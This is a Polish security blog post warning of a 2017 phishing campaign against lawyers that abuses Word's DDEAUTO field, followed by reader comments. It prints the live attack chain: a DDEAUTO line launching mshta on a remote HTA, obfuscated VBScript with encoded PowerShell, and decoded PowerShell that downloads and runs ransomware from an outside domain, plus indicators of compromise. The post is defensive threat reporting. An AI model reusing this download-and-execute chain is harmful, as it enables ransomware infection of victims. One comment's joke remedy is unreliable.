14.10.2017 | 22:42

Adam Haertle

Uwaga na nowy atak wykorzystujący najnowszą sztuczkę z Wordem

Seria ataków na prawników trwa od kilku dni, ale ten jest inny od pozostałych, ponieważ wykorzystuje odkrytą dosłownie kilka dni temu sztuczkę w Wordzie, pozwalającą na uruchomienie kodu bez użycia makro.

Jesteśmy naprawdę pod wrażeniem tempa adopcji nowinek ze świata cyberprzestepców na naszym lokalnym rynku. Zaledwie pięć dni temu opisano metodę wykonania kodu w dokumencie Microsoft Word, a już dzisiaj w nasze ręce trafiła próbka naszego ulubionego polskiego hakera, Tomka, która wykorzystuje tę sztuczkę.

Wezwanie do zaniechania czynów nieuczciwej konkurencji oraz naruszających dobra osobiste

Tomek zazwyczaj swoje emaile opiera o wykradzione wiadomości z cudzych skrzynek i zapewne podobnie jest także teraz. Wiadomość ma temat „Wezwanie do zaniechania czynów nieuczciwej konkurencji oraz naruszających dobra osobiste” i wygląda tak:

Nadawca podszywa się pod istniejącą kancelarię i tradycyjnie, jak w poprzednich 20 czy 30 kampaniach, nadana jest z serwerów Nazwa.pl:

Received: from aom185.rev.netart.pl (85.128.247.185) by
Received: from poczta.nazwa.pl (unknown [10.252.0.25])

W załączniku do wiadomości znajduje się plik Wezwanie 14_11_2017.doc, który niestety nie jest wykrywany jako złośliwy przez programy antywirusowe. Co więcej, nie jest to tradycyjny złośliwy plik proszący o uruchomienie makro (Włącz zawartość). Okna dialogowe wyglądają zupełnie inaczej i Wasi pracownicy pewnie ich jeszcze nie widzieli. Pokażcie im poniższe ekrany i ostrzeżcie przed trwającymi atakami.

Kto by nie chciał zaktualizować dokumentu?

Tak wygląda przebieg ataku, a w środku dokumentu znajdziecie po prostu ciąg:

DDEAUTO c:\\windows\\system32\\mshta.exe "http://w-szczecin.pl/xml/nowywin.hta

Pod adresem pobieranym i wykonywanym w przypadku gdy użytkownik kliknie w zły guzik znajduje się następujący kod:

Dim Doda18 : Dim AnitaU : SeT Doda18 = cREateOBJect ( "wsCrIPt.sHELl" ) : AnitaU = " powERSHEll.exe -ExeCUtIonPolIcY byPasS -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AeABtAGwALwBzADUAMAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAbgB2AHMAdABhAHIAdAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwB0AGEAcgB0AC4AZQB4AGUAHSApAA== " : Doda18.RUN CHr ( 34 ) & Doda18.eXPanDenVIroNmEntsTRiNGS( "%COMSpEC%" ) & cHR ( 34 ) & CHr ( 34 ) & "/c " & AnitaU & chr ( 34 ) , 0 : SEt Doda18 = NOTHInG

Po zdekodowaniu najważniejszego fragmentu otrzymujemy:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w-szczecin.pl/xml/s50.exe', $env:APPDATA\nvstart.exe );Start-Process ( $env:APPDATA\nvstart.exe )

a w pliku s50.exe znajdziemy ransomware Vortex / Flotera – podpis Tomka (wariant z adresami [email protected] lub [email protected]). Na szczęście kilka przyzwoitych antywirusów już wykrywa ten egzemplarz.

Ostrzeżcie znajomych i pracowników

Rzadko się zdarza, by w atakach na skrzynki Polaków pojawiło się coś nowego. Zapewne praktycznie każdy odbiorca opisanego powyżej emaila takie okna dialogowe w Wordzie zobaczy pierwszy raz w życiu. Warto by wiedział, że nie powinien klikać, tylko zamykać.

Właśnie przed takimi atakami ostrzegamy na naszych szkoleniach, gdzie pokazujemy tylko realne zagrożenia, na które trafiali w ostatnich miesiącach pracownicy polskich firm. Jedną z próbek tego ataku otrzymaliśmy własnie od uczestnika naszego szkolenia, który prawidłowo rozpoznał podstęp złoczyńców („bo pan Adam mówił, żeby w otwartym dokumencie w nic nie klikać bo może kryć się zło”). Chętnie pokażemy w Waszej firmie kilkadziesiąt prawdziwych ataków (również ten, bo właśnie dodajemy slajdy).

Security Awareness - szkolenie dla personelu

Podziękowania dla Krystiana i Marcina, którzy podesłali próbki.

IOC:

91.231.140.161:80
77.222.42.240:80
w-szczecin.pl
okocim-browar.eu
bbff3bd6722baaf7adebffa8ee0923d0a5eff5a6
8774e0a70cba7efe8ae10568f5be537b40f696d1

 

Powrót

Komentarze

  • 2017.10.14 22:49 krzyszof

    i znow ta bezieczna nazwa co php 5.4 uzywa :)

    Odpowiedz
  • 2017.10.15 00:17 Hau Hau

    „naszego ulubionego polskiego hakera, Tomka”
    .
    No nie, nie wierzę…
    Adamie, od kiedy to przestępcę i wieśniaka Thomasa, czule nazywasz „Tomkiem”?
    Może jeszcze go pozdrowisz, zamiast życzyć mu rychłego spotkania z Psiarnią a potem długiego tournee we więźniu?

    Odpowiedz
    • 2017.10.15 09:04 joe

      Podobno prawdziwy Thomas nie zajmuje się wynajdowaniem luk w zabezpieczeniach tylko sam je tworzy. Jest ze wsi i kiedyś na wieś wróci a kiedy nie jest przestępcą pluje korporacyjnym włodarzom do zupy – i ma już swoich fanów np: FanTomas.

      Odpowiedz
      • 2017.10.15 13:10 Hau Hau

        „wieśniak” to przede wszystkim stan umysłu a nie pochodzenie społeczne. Można być wieśniakiem z miasta i wielu takich jest.
        W przypadku zasrańca Thomasa nie jest ważne czy naprawdę pochodzi z wiochy, tylko to że wiochę ma swojej w głowie.

        Odpowiedz
    • 2017.10.15 09:09 Janek

      To była ironia Watsonie

      Odpowiedz
      • 2017.10.15 13:13 Hau Hau

        Oczywiście że ironia, wiedziałem o tym Sherlocku

        Odpowiedz
    • 2017.10.15 10:13 ifeq

      On nakręca im biznes szkoleniowy. Wystarczy zauważyć ich bezceremonialną autoreklamę w artykule.

      Odpowiedz
    • 2017.10.16 10:42 lol

      Masz racje, zamiast nazywać go Tomkiem powinien nazywać go Romkiem.

      Odpowiedz
  • 2017.10.15 00:48 wiesios

    Dostałem tego maila dzisiaj i zauważyłem że rzeczony Tomek nie jest specjalnie dbały o szczegóły. Adres odbiorcy jest ten sam co adres nadawcy. I słusznie. Sam powinien sobie klikać w załącznik i nie zawracać ludziom gitary.

    Odpowiedz
  • 2017.10.15 08:12 Cxx

    Wirlka nagonka na Kasperskiego a jak sie okazuje jako jeden z 2 antywirusow wykrywa to zagrozenie :-)

    Odpowiedz
    • 2017.10.15 12:14 Morph

      Kaspersky po prostu ukradł pliki od Tomka ;)

      Odpowiedz
  • 2017.10.16 08:12 qwas

    Autopromocja nie hańbi.

    Odpowiedz
  • 2017.10.16 08:55 Michał

    Skoro zachęcacie do pokazywania tego pracownikom, to warto by było zamieszczać ekrany z polskiego Worda.

    Odpowiedz
  • 2017.10.16 09:31 PiotrLenarczyk

    Jeszcze takiego antywirusa, co promuje stosowanie znacznie bardziej życiowo przydatnych, sprzętowych zapór sieciowych to nie znam. Zresztą i tak wystarczy iść do wypożyczalni kostiumów po strój kominiarza sprawdzającego wentylację grawitacyjną. Po obczajeniu wyglądu mieszkania, z filmu kupuje się taką samą lampkę/doniczkę/co tam bądź klawiaturę i medianowo wszędzie to samo hasło tekstem jawnym gotowe. Znakomita większość okien PCV jest zwyczajnie otwieralna, a bardziej zaawansowane triki jak ten tutaj opisany to raczej podprokuratorskie przedsięwzięcia dorosłych 16’latków. Jako były ekspert od dobrego teleinformatycznego bezpiecznego wrażenia, tłumaczący dlaczego lepiej płacić za opinie ekspertów RISC’o (stwierdzam, że rzeczywiście się włamali, musimy z należytą starannością sprawdzić wszelkie dane) uważam, że większość zabezpieczeń jest bezsensu – lepiej jest trzymać dane jawnie na projektach otwartych.

    Odpowiedz
  • 2017.10.16 09:39 PiotrLenarczyk

    Wie ktoś może, jak z bytecode usunąć prostą pętlę asm(„nop”) zakończoną return 0 tuż na początku ciała głównej funkcji? Słyszałem, że naprawdę nie ma wirusów na LINUX’a, bo te co są to działają wszędzie.

    Odpowiedz
  • 2017.10.16 15:51 mailo

    Pytanie. Czy dotyczy to Word MS czy każdego edytora?

    Odpowiedz
  • 2017.10.16 21:25 Obserwator

    Niestety, już wykrywa tego trojana:
    clamdscan s50.exe
    /home/pacjent/Desktop/s50.exe: Win.Trojan.Agent-6348325-0 FOUND

    ———– SCAN SUMMARY ———–
    Infected files: 1
    Time: 0.261 sec (0 m 0 s)

    Pozdro

    Odpowiedz
  • 2017.10.16 23:00 Dawidos

    Telefony w mailu też spreparowane ?
    bo telefon jeszcze należy do środka komunikacji
    i można łatwo zweryfikować czy to fake

    Odpowiedz
  • 2017.10.17 09:41 Mariusz

    Ta sama metoda jest używania już w mailach niby preawizujących przesyłkę DHL.

    Odpowiedz
    • 2017.10.17 17:19 gom1

      Dzisiaj rano przyszło takie „powiadomienie” z DHL na biurową skrzynkę firmową. W treści imię i nazwisko prezesa (prawidłowe). Wiadomość wygląda bardzo wiarygodnie. Dobrze, że dziewczyny z recepcji używają LibreOffice, bo na bank dałyby się złapać.

      Odpowiedz
  • 2017.10.18 22:25 krzysiek

    a jak sie pozbyc tego, gdy przez nieuwage padlem ofiarą ?

    Odpowiedz
    • 2017.10.19 11:40 Mucha Dzoanna

      Polej komputer octem i zasyp sodą oczyszczoną na 2-3 godziny. Później spłucz wodą demineralizowaną z domieszką cytryny. U mnie pomogło.

      Aha! Oczywiście wszystko na wyłączonym zasilaniu z gniazdka.

      Odpowiedz
  • 2017.10.19 14:03 tomek_ale_nie_ten

    „Na szczęście kilka przyzwoitych antywirusów już wykrywa ten egzemplarz.”
    Masło maślane. Zdanie z którego nic nie wynika i które mogłoby nie istnieć
    Nie można było napisać Na dzień xx.xx.xx zagrożenie jest wykrywane przez następujące AV.

    Odpowiedz

Zostaw odpowiedź do Morph

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uwaga na nowy atak wykorzystujący najnowszą sztuczkę z Wordem

Komentarze